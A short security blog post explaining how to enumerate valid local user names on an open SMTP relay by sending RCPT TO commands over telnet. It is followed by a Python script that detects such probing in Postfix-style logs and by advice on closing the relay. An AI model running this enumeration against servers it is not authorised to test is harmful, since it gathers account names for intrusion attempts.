Thursday, December 24, 2015

How to brute force local users using telnet on open SMTP relays


Sometimes during a penetration test you come across an open SMTP relay.
It can be used to brute force local user names, because the relay answers RCPT TO differently for accounts that exist and accounts that do not.

telnet <smtp-server> <port>

smtp> HELO test
smtp> MAIL FROM: bughunter@x1622.com
smtp> RCPT TO: admin@localhost
smtp> RCPT TO: root@localhost
smtp> RCPT TO: test@localhost
smtp> RCPT TO: local@localhost
...

You will receive a different response depending on whether the user exists or not.
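From the defender's side, the same behaviour leaves a clear trace in the MTA log: one client probing many recipients and collecting "User unknown" rejections. The following is an added example (not part of the original post) that flags that pattern; it assumes Postfix-style reject lines, and the log lines below are constructed, not captured from a real server.

```python
import re
from collections import defaultdict

# Constructed Postfix-style smtpd reject lines (not from a real server).
SAMPLE_LOG = """\
Dec 24 10:01:02 mx postfix/smtpd[1234]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <admin@localhost>: Recipient address rejected: User unknown in local recipient table; from=<bughunter@x1622.com> to=<admin@localhost> proto=SMTP helo=<test>
Dec 24 10:01:02 mx postfix/smtpd[1234]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <test@localhost>: Recipient address rejected: User unknown in local recipient table; from=<bughunter@x1622.com> to=<test@localhost> proto=SMTP helo=<test>
Dec 24 10:01:03 mx postfix/smtpd[1234]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <local@localhost>: Recipient address rejected: User unknown in local recipient table; from=<bughunter@x1622.com> to=<local@localhost> proto=SMTP helo=<test>
Dec 24 10:01:03 mx postfix/smtpd[1234]: NOQUEUE: reject: RCPT from unknown[203.0.113.7]: 550 5.1.1 <guest@localhost>: Recipient address rejected: User unknown in local recipient table; from=<bughunter@x1622.com> to=<guest@localhost> proto=SMTP helo=<test>
Dec 24 10:05:44 mx postfix/smtpd[1301]: NOQUEUE: reject: RCPT from mail.example.net[198.51.100.9]: 550 5.1.1 <typo@localhost>: Recipient address rejected: User unknown in local recipient table; from=<alice@example.net> to=<typo@localhost> proto=ESMTP helo=<mail.example.net>
"""

# Matches a RCPT rejection for an unknown local user and captures the
# client IP and the recipient that was probed.
REJECT_RE = re.compile(
    r"NOQUEUE: reject: RCPT from \S+\[(?P<ip>[^\]]+)\]: 550 .*?"
    r"User unknown.*? to=<(?P<rcpt>[^>]+)>"
)


def unknown_recipients_by_client(log_text):
    """Map client IP -> set of distinct recipients rejected as unknown."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        m = REJECT_RE.search(line)
        if m:
            seen[m.group("ip")].add(m.group("rcpt"))
    return seen


def flag_enumeration(log_text, threshold=3):
    """Return [(ip, count), ...] for clients that probed at least
    `threshold` distinct unknown recipients, most active first.
    A single mistyped address (one rejection) stays below the threshold."""
    hits = [(ip, len(rcpts))
            for ip, rcpts in unknown_recipients_by_client(log_text).items()
            if len(rcpts) >= threshold]
    return sorted(hits, key=lambda t: -t[1])


if __name__ == "__main__":
    for ip, n in flag_enumeration(SAMPLE_LOG):
        print(f"possible RCPT TO enumeration from {ip}: {n} unknown recipients")
```

Beyond alerting, the fix is to stop being an open relay: only accept RCPT TO for domains you are responsible for and only relay for authenticated or trusted clients, so an outside host cannot run this loop at all.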